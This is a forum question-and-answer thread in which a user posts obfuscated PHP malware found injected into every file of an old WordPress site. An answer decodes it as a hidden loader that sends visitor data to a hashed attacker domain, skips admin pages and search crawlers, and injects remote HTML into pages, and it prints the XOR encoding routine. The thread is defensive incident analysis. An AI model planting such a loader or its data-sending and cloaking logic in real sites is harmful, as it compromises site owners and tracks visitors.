# Malicious code found in WordPress theme files. What does it do?

Tags: php, wordpress, code-injection, malware, trojan

I discovered this code inserted at the top of every single PHP file inside of an old, outdated WordPress installation. I want to figure out what this script was doing, but have been unable to decipher the main hidden code. Can someone with experience in these matters decrypt it?

Thanks!

```
<?php if (!isset($GLOBALS["anuna"])) {
    $ua = strtolower($_SERVER["HTTP_USER_AGENT"]);
    if ((!strstr($ua, "msie")) and (!strstr($ua, "rv:11"))) $GLOBALS["anuna"] = 1;
} ?>
<?php $nzujvbbqez = 'E{h%x5c%x7825)j{hnpd!opjudovg-%x5c%x7824]26%x5c%x7824-%x5c%x7825)54l}%x5c%x7827;%x5c%x7825!<x5c%x782f#)rrd%x5c%x83]256]y81]265]y72]254]y76]61]y33]68]y34]68]y<X>b%x5c%x7825Z<#opo#>b{jt)!gj!<*2bd%x5c%x7euhA)3of>2bd%x5c%x7825!<5h%x5c%x78225%x5c%x7824-%x5c%x7824*<!~!dsfbuf%x5c%x)utjm6<%x5c%x787fw6*CW&)7gj6<*K)ftpmdXA6~6<u%%x7824Ypp3)%x5c%x7825cB%x5c%x7825iN}#-!tus66,#%x5c%x782fq%x5c%x7825>2q%x5c%x7825<#g6R85,67R37,18R#>#<!%x5c%x7825tww!>!%x5c%x782400~:<h%x5c%x7825_t%x5c%x7825:osvufs%x5c%x78257>%x5c%x782272qj%x5c%x7825)7gj6<**2qj%x5cc%x7860GB)fubfsdXA%x5c%x7827K6<%x5c%x787fw6*3qj985-rr.93e:5597f-s.973:8297f:5297e:56-%x5c%x7878284]364]6]234]342]58]24]311]278]y3f]51L3]84]y31M6]y3e]81#%x5c%x782f#73]y72]282#<!%x5c%x7825tjw!>!x5c%x7825%x5c%x787f!25ww2)%x5c%x7825w%x5c%x7860TW~%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%x7825:|:7#6#)tutjyf%x5c%x7860439275ttfsqnpd8;0]=])0#)U!%x5c%x7827{**u%x5c%x7%x78257-K)fujs%x5c%x7878X6<#o]o]Y%x5c%x7.3%x5c%x7860hA%x5c%x7827pd%x5c%x782525)n%x5c%x7825-#+I#)q%x5c%x7825:>:r%x5c%x7825:|:**t%x5c%x7825)m%x55%x5c%x782f#0#%x5c%x782f*#npd%}#-#%x5c%x7824-%x5c%x7824-tusvd},;uqpuft%x5c%x7860>>>!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%x5c%x787?]_%x5c%x785c}X%x5c%x7824<!%x5c%x7825tzw>!#]gj!|!*nbsbq%x5c%x7825)323ldfidk!~!<**qp%x5c%x7825!-uyf5c%x78256<.msv%x5c%x7860ftsbqA7>q%x5c%x78256<%)7gj6<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x7860LDPT7-UFOJ%x5tcvt)fubmgoj{hA!osvufs!~<3,j%x5c%x7825>j%x5c%x7825!*3!%x5c%x7!>#p#%x5c%x782f#p#%x5c%x782f%x5c%x7825z<jg!)%x5c%x7825z>>2*!%x25%x5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#y76]252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f%x7822l:!}V;3q%x5c%x7825}U;y]}R;2]},;osvufs}%x5c%x786<.fmjgA%x5c%x7827doj%x825-#jt0}Z;0]=]0#)2q%x5c%xx5c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x7824tvctus)%x5c%x78%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy%x5c%x7%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]68]y76#<%x5c%x78ec%x7825!**X)ufttj%x5c%x7822)r.985:52985-t.98]K4]65]D8]86]y37827pd%x5c%x78256<pd%x5c%x7825w6Z6<]5]48]32M3]317]445]212]445]43]321]464]n)%x5c%x7825bss-%x5c%x7825r%x5c%x7878B%x5c%x782so!sboepn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x7878W~!Ypp2)%x5cW~!%x5c%x7825z!>2<!gps)%x5c%x7825j>1<%x5c%x7825j=6[%x5c%x7825ww2%x5c%x78b%x5c%x7825w:!>!%x5c27;mnui}&;zepc}A;~!}%x5c%x787f;!|!}{;)gj}l;33bq}%x5c%x7824%x5c%x782f%x5c%x7825kj:-!OVMM*<(<%xufs:~928>>%x5c%x7822:ftmbg39*56A:>:8:^<!%x5c%x7825w%x5c%x7860%x5c%x785c^>Ew:Qb:Qc:5cq%x5c%x78257**^#zsfvr#27-SFGTOBSUOSVUFS,6<*msv%x5c%x78257-MSc%x7825=*h%x5c%x7825)m%x5c%x7825):fmji%xc%x7825w6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id1%x29%73", NULL); }IjQeTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x7878Bsfuv5c%x7827pd%x5c%x78256<C%x5c%x7827pd%x5c%x78256|6.7ec%x787f%x5c%x787f%x5c%x787f%x5%x5c%x7825)ftpmdR6<*id%x5c%x78mm)%x5c%x7825%x5c%x7878:-!%x5c%x7825tzw%x5c%x782f%x5c%x7824)#P#-#Q#-#B#-#T#-#7825l}S;2-u%x5c%x7825!-#2#%**#ppde#)tutjyf%x5c%x78604%x5c%x78223}!+!<]y74]256]y39]252]y83]2761"])))) { $GLOBALS["%x61%156%x75%156%x61"]=1; funx5c%x782fqp%x5c%x7825>5h%x5c%x7825!<*::::::-111112)%x7825zB%x5c%x7825z>!tussfw)%x5c%xu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%x5c%x7825**#k#)tutjyf%x5c%x7860%x5c%x7878%x5c165%x3a%146%x21%76%x21%50%x5cction fjfgg($n){return 78256<pd%x5c%x7825w6Z6<.4%x5c%x7860hA%x5c%x76]277]y72]265]y39]271]y83]256]y78]248]y827!hmg%x5c%x7825!)!gj!<2,*qpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824x7825%x5c%x7824-%x5c%x7824y4%x5c%x7824-%x5c%x7824]y8%x5c%x7824doF.uofuopD#)sfebfI{*w%x5c%x7825)kV%x5c%x7878{c%x7825)!>>%x5c%x7822!ftmbg)!gj<*#k#)usbut%x5c%x7860cpV%x561%154%x28%151%x6d%160%x6c%157%x6%x5c%x7824gps)%x5c%x7825j>1<%x5c%x7825j=tj{fpg)%x5c%x785j:.2^,%x5c%x7825b:<!%x5c%x<2p%x5c%x7825%x5c%x787f!~!<##!>!2p%x5c%x7825Z<^2%x5c%x785c2b%x5c%x78*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x7825%x5c%x785cSFWSFT%x5c%x78787fw6*%x5c%x787f_*#ujojRk3%x5c%x7860{666~6<&w6<%x5c%x787fw6*CW%x7860hfsq)!sp!*#ojneb#-*f%x5c%x7825)sf%x57#@#7%x5c%x782f7^#iubq#%x5c%x785cq%x5c%x5c%x7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c61%171%x5f%155%x61%160%x28%42%x66%152%x66%147%x67%42%x2c%163%x7x5c%x787fw6*%x5c%x787f_*#fubfsdXk5%x5c%x7860{66~6<&w6<%x5ce:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78x5c%x7825o:W%x5c%x7825c:>1<%x5c%x7825b:>1<!gps)%x5c%x782x5c%x7825j:,,Bjg!)%x5c%x7825j:>>1*!%k;opjudovg}%x5c%x7877825r%x5c%x785c2^-%x5c%x7825hOh%x5c%x782f#00#W~!%}6;##}C;!>>!}W;utpi}Y;tuofuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5!|!**#j{hnpd#)tutjyf%x5c%x7860opjudovg%x5c%x7822)!gj}1~!%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{ftmfV%x5c%x787f<*XAZASV<*w%x5c%5c%x7878:<##:>:h%x5c%x7825:<#64y]552]e7y]#>n%x5c%x77825c:>%x5c%x7825s:%x5c%x785c%x5c%x7825j25!>!2p%x5c%x7825!*3>?*2b%x5c%x7825)gpf%x5c%x7825!*##>>X)!gjZ<#opo#>b%x533]65]y31]53]y6d]281]y43825<#762]67y]562]38y]572]48y]j%x5c%x7825!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubx7824-!%x5c%x7825%x5c%x7824-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%%x5c%x7825)}.;%x5c%x7860UQPMSVD!-id%x5c%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5c%x7825tww**WYsboep5h>#]y31]278]y3e]81]K78:56985:6197g:74787fw6<*K)ftpmdXA6|7**197-2qj%x5c%x78257-K)udfoopdXA%x5c%x7822o]#%x5c%x782f*)323zbe!-#jt0*?]+^782f#00;quui#>.%x5c%x7825!<***f%x5c%x7946:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQc%x7825}K;%x5c%x7860ufldpt}X;%x5c%x7860msvd}R;*msv5c%x782f#%x5c%x782f},;#-#}+;%x5c%x7825-qp%x5c%x7&f_UTPI%x5c%x7860QUUI&e_SEEB%x5c%x7860FUPNFS&d_SFSFGFS%x5c%x7860QUUI&5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fmjgk4%x5c%x7860{6~6<tfs%x5+{e%x5c%x7825+*!*+fepdfe{h+{d%x5c%x7825)+opjudovg+)!gj+{25)Rb%x5c%x7825))!gj!<*#cd1%x5c%x782f20QUUI7jsv%x5c%x78257UFH#%x5c%x7827rfs%x5c%x78256~6<%x5c%xj!|!*msv%x5c%x7825)}k~~~<ftm4-%x5c%x7824y7%x5c%x7824-%x5ce%x5c%x7825!osvufs!*!+A!>!{e%x5x7825)uqpuft%x5c%x7860msc%x7825>U<#16,47R57,27R]K5]53]Kc#<%x5c%x7825tp&)7gj6<.[A%x5c%x7827&6<%x5c%x787fw6*%x5c%x787f_*#[k2%x5c%x7860{6:!}7;!x7825!<**3-j%x5c%x78%x5c%x7825bT-%x5c%x7825hW~%x5c%x7825fdy)##-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz)#]341]88M4P8]37]278]225]241]3x5c%x782f#%x5c%x7825#%x5c%x782f#mqnj!%x5c%x782f!#0#)idubn%x5c#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<%x5c#-%x5c%x7825tdz*Wsfuvso!%x5c%78242178}527}88:}334}472%x5c%x7824<!%x5c%x7825mm!>!#]y81]273fttj%x5c%x7822)gj6<^#Y#%x5c%x785cq%x5c%x7825%x5c%x7827Y%x>!bssbz)%x5c%x7824]25%x5c%x7824-%x5c%x7825%x5c%x7827jsv%x5c%x78256<C>^#zsfvr#%x5c%x785c%x78256<^#zsfvr#%x5c%x785cq%x5c%x78257%x5c%x782f#QwTW%x5c%x7825hIr%x5c%x785c1^-%x5c%xf!>>%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjudovg}{;60%x5c%x7825}X;!sp!*#opo#>>}R;msv}.;%x5c%x782f#%xc%x787f<u%x5c%x7825Vif((function_exists("%x6f%142%x5f%163%x74%141%x7%x78246767~6<Cw6<pd%x5c%x7825w6Z6<.5%x5c%x7860hA%x5c%x7827pd%x5c%xz!>!#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M5]DgP5]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4x5c%x78257>%x5c%x782f7&6|7**11x5c%x785c1^W%x5c%x7825c!>!%x5c%x7825i%x5c%x785c2^<!Ce*[!%x5 c%x7825c5c%x7825z>3<!fmtf!%x5c%x7825z>2<!%x5c%x7825)dfyfR%x5c%x7827tfs%x54%162%x5f%163%x70%154%x69%164%50%x22%134%x78%62%x35%c%x78256<*17-SFEBFI,6<*127-UVPFNJU,6<*#)tutjyf%x5c%x7860opjudovg)!gE#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*j%x5c%x7825!-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7%x7825tmw!>!#]y84]275]y83]273]y76]277#<%x5c%x7825t2w>#]y74]273]%x5c%x785cq%x5c%x7825)uoe))1%x5c%x782f35.)1%x5c%x782f14+9**-)1%x5c%x782f2986+7**^%x5c%x782f%x!>!tus%x5c%x7860sfqmbdf)%x5c%4:]82]y3:]62]y4c#<!%x5c%x7825t::!>!%x5c%x7825)hopm3qjA)qj3hopmA%x5c%x78273qj%x5c%x78256<*Y%x6<pd%x5c%x7825w6Z6<.2%x5c%x7860hA%x]252]y74]256#<!%x5c%x7825ggg)(0)%x5c%x782f+*0f(-!#]yq%x5c%x7825V<*#fopoV;hojepmsvd}+;!>!}%x5c%x7827;!4%145%x28%141%x72%162%x7827!hmg%x5c%x7825)!gj!|!*1?hmg%x5c%x7825)!gj!<**2-4-bubE{h%x5#57]38y]47]67y]37]88y]27]28y]#%x5c%x782fr%x5c%x7825%x5c%x782fh%x5c%x78827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%x7827,*b%x5c%s%x5c%x7825>%x5c%x782fh%x5c%x7825:<**%x5c%x7825G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%x5c%xov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:825<#372]58y]472]37y]672]48y]#>s%x5c%x7825<#462]47y]252]18y]#>q%x5c%x77825zW%x5c%x7825h>EzH,2W%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825rN}7825bG9}:}.}-}!#*<%x5c%x7825nfd>%x5c%x7825fdy<Cb*]78]y33]65]y31]55]y85]82]y76]62]y3:]84#-!OVMM*<%x22%51%x29%5c%x7878pmpusut)tpqssutRe%x5c%x7825)Rd%x5c%x78]y76]258]y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7825ff2!c%x7825)sutcvt)esp>hmg%x5c%x7825!<12>%x787fw6*CW&)7gj6<*doj%x5c%x78257-C)fepmqnjA%x5c%x7827&7860gvodujpo)##-!#~<#%x5c%x782f%x5c%x7825%x5c%x7824-%x5c%x7824!>!fyqchr(ord($n)-1);} @erro%x7824*<!%x5c%x7824-2bge56+99386c6f+9f5d816:+25)3of:opjudovg<~%x5c%x7824<!%x5c%x7825o:!>!%x5c%x824<%x5c%x7825j,,*!|%x5c%x7824-%x5c%x7824gvodujpo!%x5c%x782mpef)#%x5c%x7824*<!%x5c%x7825kj:!>!#]y3825!*72!%x5c%x7827!hmg%x5c%x7825b:>1<!fmtf!%x5c%x7825b:>%x5c%x7825s:%x5c%x785c%x5c%x782[%x5c%x7825h!>!%x5c%x7825tdz)%x5c%x7825bbT-d]51]y35]256]y76]72]y3d]51]y35]274]yeobs%x5c%x7860un>qp%x5c%x7825!|Z~!<##!>!2p%x5c%x7825!|!*!*#>m%x5c%x7825:|:*r%x5c%x7825:-t%x5c%x78]275]D:M8]Df#<%x5c%x7825tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<bg!osvufs!|ftmf!~<**9.-j%x5c5c%x78e%x5c%x78b%x5c%x7825ggg!>!#]y81]273]y76]258]y6g]273]y76]271]y7dx7825)ppde>u%x5c%x7825V<#65,47R25,d7R17,67R37,#%x5c%x782fq%x5**b%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5c%x7sfw)%x5c%x7825c*W%x5c%x7825eN+#Qi%x7825bss%x5c%x785csbhpph#)zbssb!-#}#)fep:~:<*9-1-r%x5c%x7825)825,3,j%x5c%x7825>j%x5c%82f!**#sfmcnbs+yfeobz+sfwjidsb%x5c%x7860bj+upcotn+qsvmt+fmc%x78786<C%x5c%x7827&6<*rfs%x5c1127-K)ebfsX%x5c%x7827u%x5c%x7825)7fmji%x5%x7825-bubE{h%x5c%x7825)su34]368]322]3]364]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]452]88825-#1GO%x5c%x7822#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)25-bubE{h%x5c%x7825)sutcvt-#w#)ldbqov>*ofmy%x5c%x7825)utjm!|!*5!%x5c%xx7827)fepdof.)fepdof.%x5c%x782f#@#%V,6<*)ujojR%x5c%x7827id%x5c%x78256<%x5c%xr_reporting(0); preg_replace("%x2f%50%x2e%52%x29%57%x65","%x65%166%xy76]277]y72]265]y39]274]y85]273]y6g]273]y76]271]y7d]252c_UOFHB%x5c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)323zbek!~!<b%*#}_;#)323ldfid>}&;!osvufs}%x5c%x787f;!opjudovg}k~~9{d%x5c%x7825:osv2%164") && (!isset($GLOBALS["%x61%156%x75%156%xu%x5c%x7825)3of)fepdof%x5c%x786057ftbc%x5c%x787f!|!5c%x7825r%x5c%x7878<~!!%x5c%x7825s:N}#-%8257;utpI#7>%x5c%x782f7rfs%x5c%x78256<#o]5j:>1<%x5c%x7825j:=tj{fpg)%x5c%x7825s:*<%5c%x7825)fnbozcYufhA%x5c%x78272qj%x/(.*)/epreg_replacestvbowvmjj';
    $uskbxljsbs = explode(chr((169 - 125)), '6393,48,9851,47,2858,50,3117,23,8291,22,9595,68,3457,33,7412,23,3914,63,6775,52,3088,29,1791,56,2150,28,6441,66,3140,43,1906,35,926,36,7276,35,2578,51,2993,59,275,45,6613,30,9241,42,9210,31,886,40,9989,41,5417,69,4931,62,1312,54,534,47,483,51,7223,53,10071,35,6190,50,3811,39,6142,48,2353,24,7062,23,6048,57,1266,46,3977,58,8168,55,1633,23,5272,63,2455,47,2659,30,6751,24,6827,38,2377,38,9554,41,3706,63,5644,70,4249,67,5105,50,4787,40,5574,24,1087,21,7389,23,1108,60,6277,47,6865,29,5486,28,8828,28,9283,26,1366,61,3223,27,6949,50,8506,23,3850,64,1739,52,9128,24,5714,20,9449,70,7435,62,8131,37,4653,70,0,29,4316,56,3572,68,4528,39,180,20,9379,70,200,35,1028,30,92,20,5025,38,7567,50,9519,35,2908,51,8672,58,8986,47,9152,58,9087,20,5879,29,3769,42,8029,45,5391,26,8333,25,5063,42,5203,69,9718,65,726,20,157,23,4567,33,1847,28,1212,54,9898,51,3640,66,6324,49,5155,48,61,31,9783,68,2271,36,815,38,7717,69,2793,42,5335,56,5543,31,3399,58,2629,30,6373,20,4372,65,8925,61,5598,23,362,57,7363,26,3353,46,3052,36,1581,52,2178,48,4180,20,853,33,1656,26,2766,27,5847,32,4993,32,1168,44,9663,55,2835,23,698,28,5908,51,6999,63,1530,51,419,64,9107,21,7617,37,7497,70,962,66,2415,40,4437,51,7786,70,4624,29,8730,39,8358,50,5988,60,8074,57,6105,37,4723,64,1682,57,1489,41,1058,29,3250,41,7155,29,3291,62,29,32,8408,59,5514,29,8313,20,3490,55,235,40,8223,68,8467,39,8636,36,7184,39,320,42,9033,34,6643,67,2521,57,2026,60,2959,34,7856,64,6240,37,4200,49,4827,66,1979,47,4893,38,581,48,1875,31,655,43,4035,53,5621,23,6507,46,6553,60,8769,59,7654,63,7920,49,8593,43,5734,68,5802,45,9309,70,1941,38,629,26,5959,29,9067,20,7085,70,9949,40,4088,56,10030,41,4144,36,8529,64,3545,27,4488,40,2307,46,2086,64,1427,62,6710,41,746,69,2689,20,2709,57,6894,55,2226,45,8856,26,8882,43,7311,52,3183,40,112,45,4600,24,7969,60,2502,19');
    $aemhtmvyge = substr($nzujvbbqez, (69491 - 59385), (44 - 37));
    if (!function_exists('hperlerwfe')) {
        function hperlerwfe($opchjywcur, $oguxphvfkm) {
            $frnepusuoj = NULL;
            for ($yjjpfgynkv = 0;$yjjpfgynkv < (sizeof($opchjywcur) / 2);$yjjpfgynkv++) {
                $frnepusuoj.= substr($oguxphvfkm, $opchjywcur[($yjjpfgynkv * 2) ], $opchjywcur[($yjjpfgynkv * 2) + 1]);
            }
            return $frnepusuoj;
        };
    }
    $rfmxgmmowh = " /* orpuzttrsp */ eval(str_replace(chr((230-193)), chr((534-442)), hperlerwfe($uskbxljsbs,$nzujvbbqez))); /* unvtjodgmt */ ";
    $yiffimogfj = substr($nzujvbbqez, (60342 - 50229), (38 - 26));
    $yiffimogfj($aemhtmvyge, $rfmxgmmowh, NULL);
    $yiffimogfj = $rfmxgmmowh;
    $yiffimogfj = (470 - 349);
    $nzujvbbqez = $yiffimogfj - 1; ?>
```

Comment: Who cares what it does, you now probably have a few backdoors and need to reinstall everything. Good Luck!

Comment: Thanks for the totally useless answer. I care, actually. I want to ensure that when I move the site over to a new server after removing all the malicious that I don't bring any issues along with it.

Comment: @specik You'll likely be bringing over whatever vulnerability allowed this in the first place.  Best practice is to restore to a good backup and ensure your WP and all plugins are well patched.

Comment: It's a totally useless question, translating that code into something that is human readable takes a lot of time and effort, that's why they wrote it like that, so there's noone here that can tell you exactly what that does without spending a great deal of time trying to translate it.

Comment: @ceejayoz Thanks. I've sort of inherited this problem. It's an old server that was neglected before my time at the company so it didn't have backups setup, and I have no way to tell when the problem started. I've already updated WordPress + plugins and removed the malicious PHP code. My concern right now is if this script changed anything else on the file system of the current server that I may miss and potentially bring over.

Comment: Code like this is designed to open up your server and allow free access to *any* file that's accessible by the web server. The only way you'll ever know for sure it's been cleaned is to re-install absolutely everything you can from scratch - i.e. fresh wordpress install, fresh plugin install. Then literally comb every line of your theme for anything out of the ordinary. Also of note, they often will put things in wp-content/uploads that look like images but aren't - check those too.

Comment: I got a little curious and began decoding. The first `$aemhtmvyge` variable, which is later used in a `preg_replace` statement, is assigned `x/(.*)/` which is an incorrect regex pattern. Given an extra char in `$nzujvbbqez` it would however give the more usable `/(.*)/e`, so I suspect you may have lost some (lower ascii?) chars when pasting the code into your question. Would you mind making the original source file (trojan part) available for download somewhere? Then I can have a further look at it.

Answer (score 2, accepted):

After digging though the obfuscated code untangling a number of `preg_replace`, `eval`, `create_function` statements, this is *my try on explaining* what the code does:

The code will start output buffering and register a callback function triggered at the end of buffering, e.g. when the output is to be sent to the web server.

**First**, the callback function will attempt to uncompress the output buffer contents if necessary using `gzinflate`, `gzuncompress`, `gzdecode` or a custom `gzinflate` based decoder (I have not dug any deeper into this).

With the contents uncompressed, a request will be made containing the $_SERVER values of

- HTTP_USER_AGENT
- HTTP_REFERER
- REMOTE_ADDR
- HTTP_HOST
- PHP_SELF

... to the domain given by chars 0-8 or 8-15 (randomly picks one or the other) in an `md5` hash of the IPv4 address of "stat-dns.com" appended with ".com", currently giving `md5(".com" . <IPv4> )` => `md5(".com8.8.8.8")` => `"54dfa1cb.com"` / `"33db9538.com"`.

The request will be attempted using `file_get_contents`, `curl_exec`, `file` and finally `socket_write`.

Note that *no request will be made* if:

- any of the `HTTP_USER_AGENT`, `REMOTE_ADDR` or `HTTP_HOST` is empty/not set
- `PHP_SELF` contains the word "admin"
- `HTTP_USER_AGENT` contains any of the words "google", "slurp", "msnbot", "ia_archiver", "yandex" or "rambler".

**Secondly**, if the output buffer contents has a `body` or `html` tag, and the response from the request above (decoded using `en2()` function below) contains at least one "!NF0" string, the content between the first and second "!NF0" (or end of string) will be injected into the HTML page at the beginning of the `body` or in case there is no `body` tag, the `html` tag.

The code used for encoding/decoding traffic is this one:

```
function en2($s, $q) {
    $g = "";
    while (strlen($g) < strlen($s)) {
        $q = pack("H*", md5($g . $q . "q1w2e3r4"));
        $g .= substr($q, 0, 8);
    }
    return $s ^ $g;
}
```

`$s` is the string to encode/decode and `$q` is a random number between 100000 and 999999 acting as a key.

The request URL mentioned above is calculated like this:

```
$url = "http:// ... /"
    . $op // Random number/key
    . "?"
    . urlencode(
          urlencode(
              base64_encode(en2( $http_user_agent, $op)) . "." .
              base64_encode(en2( $http_referrer,   $op)) . "." .
              base64_encode(en2( $remote_addr,     $op)) . "." .
              base64_encode(en2( $http_host,       $op)) . "." .
              base64_encode(en2( $php_self,        $op))
          )
      );
```

While I have not found any sign of what initially placed the malicious code on your server, or that it does anything else than allowing for bad HTML/JavaScript code to be injected on your web pages that does not mean that it is not still there.

You really should make a clean install, like suggested by @Bulk above:

> The only way you'll ever know for sure it's been cleaned is to
>   re-install absolutely everything you can from scratch - i.e. fresh
>   wordpress install, fresh plugin install. Then literally comb every
>   line of your theme for anything out of the ordinary. Also of note,
>   they often will put things in wp-content/uploads that look like images
>   but aren't - check those too.

Pastebin [here](http://pastebin.com/Z03USpr7).

Comment: Thank you very much for your detailed response. Much appreciated. I've been going through everything line by line and making sure I've killed this thing properly. Going to do a fresh install of everything possible on the new server.